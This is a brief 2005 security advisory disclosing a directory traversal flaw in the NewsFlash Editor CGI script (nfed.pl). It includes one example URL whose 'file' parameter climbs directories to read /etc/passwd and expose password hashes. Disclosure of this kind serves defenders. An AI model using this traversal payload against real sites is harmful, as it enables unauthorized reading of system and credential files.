BadRoot Security Advisory #0x03

---------------------------------------------
Author ......  Spher3
Date ........  26-06-2005
Product .....  NewsFlash Editor (nfed.pl)
Type ........  Directory traversal
---------------------------------------------

Info:
-----
This script is used as web-editor.

Description:
------------
There is a directory traversal vulnerability in NewsFlash Editor (nfed.pl).
A malicious kiddies can, if the passwds aren't hidden, 
read the hashes.

Example:
--------

http://www.somesite.org/cgi-bin/nfed.pl?file=../../../../../../etc/passwd

